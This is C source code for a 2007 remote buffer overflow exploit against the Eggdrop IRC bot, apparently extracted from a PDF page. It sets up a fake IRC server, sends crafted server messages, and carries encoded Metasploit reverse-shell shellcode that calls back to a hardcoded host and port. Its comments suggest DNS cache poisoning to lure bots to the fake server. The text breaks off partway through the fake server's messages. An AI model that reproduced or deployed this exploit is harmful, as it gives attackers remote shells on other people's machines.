1 /*
2 Eggdrop Server Module Message Handling Remote Buffer Overflow Vulnerability
3 http://www.securityfocus.com/bid/24070
4 discovered by Bow Sineath
5 tested on eggdrop 1.6.18 / linux 2.4
6
7 −exploit is a fake ircd
8
9 replace shellcode.. strip 0x00,0x0a and a few more probably.
10 remember to add \n at end of shellcode.
11 poison some dns cache or .jump
12 play.
13
14 −bangus/magnum
15 */
16
17 #include <stdio.h>
18 #include <stdlib.h>
19 #include <unistd.h>
20 #include <sys/types.h>
21 #include <sys/socket.h>
22 #include <netinet/in.h>
23 #include <string.h>
24 #include <arpa/inet.h>
25
26 #define LISTENPORT 6667
27 #define BACKLOG 3
28 #define RETADDR 0xbffff7b9
29
30
31 /*
32 * linux/x86/shell_reverse_tcp − 99 bytes
33 * http://www.metasploit.com
34 * Encoder: x86/shikata_ga_nai
35 * LPORT=4444, LHOST=10.0.0.250
36 */
37
38 unsigned char shellcode[] =
39
"\xbf\x1a\x2f\xf0\x55\xdb\xc9\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
40
"\x13\x31\x7b\x12\x83\xeb\xfc\x03\x61\x21\x12\xa0\xa4\xe6\x81"
41
"\x08\x95\x72\x24\xe5\x7f\xdb\xa1\x18\xb2\x5b\x22\x83\xfc\x63"
42
"\x88\xb4\xb5\xe2\xeb\xee\x1f\x7d\x06\x11\x9f\x87\x70\x79\x8e"
43
"\x2b\x3e\x1f\xe3\x5a\x21\x6f\x65\x0d\xf3\xc3\xe0\x4c\xb0\x2e"
44
"\x72\xdc\x5f\x9e\x5d\x92\xf7\x88\x8e\x36\x61\x27\x59\x55\x23"
45
"\xe4\xd0\x7b\x74\x01\x2f\xfb\x75\x16"
46
"\n";
47
48 char *req=
49 ":hybrid7.debian.local NOTICE AUTH :*** Looking up your hostname...\n"
50 ":hybrid7.debian.local NOTICE AUTH :*** Checking Ident\n"
51 ":hybrid7.debian.local NOTICE AUTH :*** No Ident response\n"
52 ":hybrid7.debian.local NOTICE AUTH :*** Your forward and reverse DNS do not match, ignoring hostname.\n"
Page 1/3
Eggdrop Server Module Message Handling Remote BoF Exploit
bangus/magnum
10/10/2007
53 ":hybrid7.debian.local 001 tata :Welcome to the debian Internet Relay Chat Network tata\n"
54 ":hybrid7.debian.local 002 tata :Your host is hybrid7.debian.local[127.0.0.1/6667], running version hybrid−7.2.2.dfsg.1−debian−3\n"
55 ":hybrid7.debian.local 003 tata :This server